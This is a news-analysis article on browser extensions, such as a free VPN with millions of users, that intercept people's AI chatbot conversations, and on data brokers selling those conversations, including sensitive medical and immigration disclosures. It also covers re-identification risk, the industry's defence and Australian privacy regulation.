AI Chatbot Data Being Harvested and Sold by Data Brokers

From Tokyo, the sheer candour with which people use AI chatbots can be startling. In Japan, where social norms traditionally discourage frank disclosure of personal distress, users have taken to asking chatbots about mental illness, relationship breakdowns, and financial ruin with a freedom they would rarely extend to a colleague or even a doctor. What Australian observers often miss about this shift, however, is that the intimacy people feel with AI assistants is being turned into a commercial product, one that is now actively traded on the open market.

A report provided to The Register by Lee Dryburgh, a specialist in AI visibility for consumer health and longevity brands, lays out the mechanics in clinical detail. Data brokers are selling access to sensitive personal data captured during chatbot conversations, despite claims that the data is anonymised and obtained with consent. The method is, in retrospect, almost elegantly simple. People install browser extensions that purport to offer free VPN service or ad blocking, likely without reading the extension's privacy policy, and those extensions may silently intercept users' communications with AI services like ChatGPT, Gemini, Claude, and DeepSeek. The interception works at the code level: the extensions override the browser's native fetch() and XMLHttpRequest() functions in order to capture every prompt and every response.

The December 2025 investigation by Koi Security, titled "8 Million Users' AI Conversations Sold for Profit by 'Privacy' Extensions", put a precise figure on the problem. Researchers found that Urban VPN Proxy, a Chrome and Edge extension with a 4.7 rating on the Google Web Store, had been collecting data from eight popular AI chatbots: ChatGPT, Claude, Gemini, Microsoft Copilot, Perplexity, DeepSeek, Grok, and Meta AI. The harvesting affected roughly 8 million users, including 6 million on Chrome alone, with hundreds of thousands more across other products by the same publisher. The extension's "AI Protection" feature, which displayed warnings about sharing personal data with chatbots, offered no real cover: the data collection and the protection notifications operated independently, and enabling or disabling the warning feature had no effect on whether conversations were captured and exfiltrated. The extension harvested everything regardless.

What Dryburgh found in the resulting databases is genuinely alarming. After gaining access to a major venture-capital-backed analytics platform, he made 205 queries using semantic search and received approximately 490 unique prompts from more than 435 distinct users across 20 sensitive categories. Customers of these data brokers can search and find conversations about suicide, medical records that may enable identification, HIV lab results, abortion clinic searches, immigration status disclosures, domestic violence narratives, and children's conversations. The data is stored with pseudonymised identifiers, but the protection that affords is thin. Panelists have pseudonymised IDs based on SHA-256 hashes, but the content of their conversations is stored verbatim and searchable, and many prompts contain real names, dates of birth, medical record numbers, and diagnosis codes.

The most damning finding, Dryburgh said, is that healthcare workers are pasting real patient data into AI chatbots, and that data is now a commercial database. The report includes examples such as a user asking an AI whether they are pregnant, accompanied by their first name and date of birth. It also describes conversations that appear to come from undocumented immigrants and asylum seekers who posed questions to chatbots about their legal status. Having this information available in a commercial database creates serious legal risk, Dryburgh argues.

A second, related development reported by iTnews adds another layer to the picture. Separate research into residential proxy networks shows that AI companies seeking fresh training data are inadvertently driving demand for ecosystems built on co-opted consumer devices. The dynamics share a common thread with the browser-extension problem: users are enrolled into surveillance infrastructure they do not fully understand, either through free VPNs, ad blockers, or apps that promise to "monetise" unused bandwidth. As Maynard Koch, chair of distributed and networked systems at Germany's Technische Universität Dresden, told iTnews, if you use such a free service you essentially install proxy software on your device and become part of a broader network, with providers able to claim the arrangement is ethically sourced because users agreed to terms of service. The aggregated effect of these overlapping systems is a data market that is simultaneously vast and largely invisible to the people generating the content.

The data aggregators push back. The companies that aggregate this clickstream data insist that their data handling is lawful and the data is anonymised. That position is not without some legal grounding; opt-in consent panels have been a legitimate market research tool for decades. Profound, one platform that has come under scrutiny, has described itself as licensing data from well-known, established providers, comparing the arrangement to the audience research panels that Nielsen pioneered in the 1920s. The distinction the industry draws is between consented, aggregated behavioural data and the individual-level disclosure that critics say is slipping through anyway.

Those arguments carry less weight when set against the technical reality. It has long been known that anonymised profiles can sometimes be re-identified by connecting a few data points, a process that AI assistance has made considerably easier. And as Koi Security researcher Idan Dardikman observed, the deeper problem is one of misaligned expectations: people have developed a level of candour with AI assistants that they do not have with search engines or regular browsing, sharing medical concerns, financial details, relationship issues, and proprietary code, under the assumption that this stays between them and the AI provider.

For Australian users, the regulatory picture is improving but remains incomplete. The Office of the Australian Information Commissioner has become more active, issuing AI-specific privacy guidance in late 2024 and launching its first-ever compliance sweep of business privacy policies in early 2026. Australia's privacy regulator has been proactive in interpreting the Privacy Act in AI contexts, actively regulating AI through interpretation and enforcement rather than waiting for dedicated legislation. Critically, the OAIC has flagged data brokerage, advertising technology such as pixel tracking, and practices that erode privacy rights in the application of AI among its priority enforcement areas. New transparency obligations around automated decision-making are scheduled to take effect in December 2026, though critics argue these reforms still leave cross-border data exploitation largely unaddressed.

The honest tension here is between two legitimate interests. Clickstream analytics and market research serve real purposes: understanding what people ask AI tools shapes product development, public health communication, and commercial strategy. The data economy, for all its excesses, is not inherently illegitimate. The problem is not data collection per se, but the gap between what users are told and what is actually done with their most private thoughts. An extension that warns users not to share sensitive data with ChatGPT while simultaneously forwarding every word to a data broker is not a privacy tool; it is a deception, regardless of what a buried privacy policy technically permits.

The pragmatic response is not to demand an end to AI analytics, but to insist on genuine informed consent, robust de-identification standards with independent verification, and clear liability when re-identification occurs. In the meantime, researchers recommend uninstalling browser extensions that have permission to read and modify site data, and considering using AI chatbots in incognito or private mode, which can block extension access. For the broader regulatory project, Australia's evolving privacy framework is pointed in roughly the right direction. Whether it moves fast enough to keep pace with what is being captured, stored, and sold is a harder question.